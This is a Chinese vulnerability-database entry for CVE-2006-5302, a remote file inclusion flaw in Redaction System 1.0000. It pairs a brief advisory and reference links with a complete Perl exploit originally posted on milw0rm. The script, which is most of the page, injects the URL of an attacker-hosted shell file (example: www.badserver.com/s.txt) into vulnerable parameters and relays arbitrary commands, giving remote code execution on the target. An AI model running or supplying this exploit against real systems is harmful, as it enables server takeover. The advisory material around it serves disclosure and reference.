Redaction System 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111256 漏洞类型 代码注入
发布时间 2006-10-12 更新时间 2009-03-25
CVE编号 CVE-2006-5302 CNNVD-ID CNNVD-200610-281
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2534
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-281
|漏洞详情
RedactionSystem1.0000中的多个PHP远程文件包含漏洞,远程攻击者可以通过(1)(a)conn.php,(b)sesscheck.php,(c)wap/conn.php或(d)wap/sesscheck.php的lang_prefix参数或者(2)(e)index.php的lang参数中的URL来执行任意PHP代码。
|漏洞EXP
#!/usr/bin/perl

use LWP::UserAgent;

$target = @ARGV[0];
$shellsite = @ARGV[1];
$shellcmd = @ARGV[2];
$fileno = @ARGV[3];

if(!$target || !$shellsite)
{
    usage();
}

header();

if ($fileno eq 1)
{
    $file = " conn.php?lang_prefix=";
}
elsif ($fileno eq 2)
{
    $file = "index.php?lang=";
}
elsif ($fileno eq 3)
{
    $file = "sesscheck.php?lang_prefix=";
}
elsif ($fileno eq 4)
{
    $file = "wap/conn.php?lang_prefix=";
}
elsif ($fileno eq 5)
{
    $file = "wap/sesscheck.php?lang_prefix=";
}
else
{
    $file = "conn.php?lang_prefix=";
}

while()
{
    print "[cmd]\$";
    while (<STDIN>)
    {
        $cmd = $_;
        chomp($cmd);
print $target.'/'.$file.'='.$shellsite.'?&'.$shellcmd.'='.$cmd;
        $xpl = LWP::UserAgent->new() or die;
        $req = HTTP::Request->new(GET=>$target.'/'.$file.'='.$shellsite.'?&'.$shellcmd.'='.$cmd) or die("\n\n Failed to connect.");
        $res = $xpl->request($req);
        $rp = $res->content;
        $rp =~ tr/[\n]/[ê]/;
print $rp;
        if (!cmd)
        {
            print "\nEnter command: \n";
            $rp = "";
        }
        elsif ($rp=~/failed to open stream: HTTP request failed!/ || $rp=~/: Cannot execute a blank command in <b>/)
        {
            print "\nUnable to connect to Shellsite, or invalid command variable\n";
            exit;
        }
        elsif ($rp=~/^<br.\/>.<b>Warning/)
        {
            print "\nInvalid Command\n\n";
            exit;
        }
       
        if ($rp=~ /(.+)<br.\/>.<b>Warning.(.+)<br.\/>.<b>Warning/)
        {
            $final = $1;
            $final=~ tr/[ê]/[\n]/;
            print "\n$final\n";
        }
        else
        {
            print "[cmd]\$ ";
        }
    }
}

sub header()
{
    print q
    {
######################################################################
       Redaction System 1.0000 - Remote Include Exploit
        Vulnerability discovered and exploit by r0ut3r
               writ3r@gmail.com
          Special thanks to Warpboy's perl tutorial
             http://milw0rm.com/papers/85
######################################################################
    };
}

sub usage()
{
header();
    print q
    {
######################################################################
Usage:
perl rs_xpl.pl <Target website> <Shell Location> <CMD Variable> <No>
<Target Website> - Path to target eg: www.rsvuln.target.com
<Shell Location> - Path to shell eg: www.badserver.com/s.txt
<CMD Variable> - Shell command variable name eg: cmd
<No> - File number, corresponding to:
1: conn.php
2: index.php
3: sesscheck.php
4: wap/conn.php
5: wap/sesscheck.php
######################################################################
    };
exit();
}

# milw0rm.com [2006-10-12]
|参考资料

来源:XF
名称:redaction-lang-file-include(29504)
链接:http://xforce.iss.net/xforce/xfdb/29504
来源:BID
名称:20499
链接:http://www.securityfocus.com/bid/20499
来源:MILW0RM
名称:2534
链接:http://www.milw0rm.com/exploits/2534
来源:VUPEN
名称:ADV-2006-4024
链接:http://www.frsirt.com/english/advisories/2006/4024
来源:SECUNIA
名称:22347
链接:http://secunia.com/advisories/22347
来源:redactionsystem.sourceforge.net
链接:http://redactionsystem.sourceforge.net/index.php?m=news&id=5
来源:redactionsystem.sourceforge.net
链接:http://redactionsystem.sourceforge.net/index.php?m=news&id=2
来源:OSVDB
名称:29704
链接:http://www.osvdb.org/29704
来源:OSVDB
名称:29703
链接:http://www.osvdb.org/29703
来源:OSVDB
名称:29702
链接:http://www.osvdb.org/29702
来源:OSVDB
名称:29701
链接:http://www.osvdb.org/29701
来源:OSVDB
名称:29700
链接:http://www.osvdb.org/29700
来源:MILW0RM
名称:2534
链接:http://milw0rm.com/exploits/2534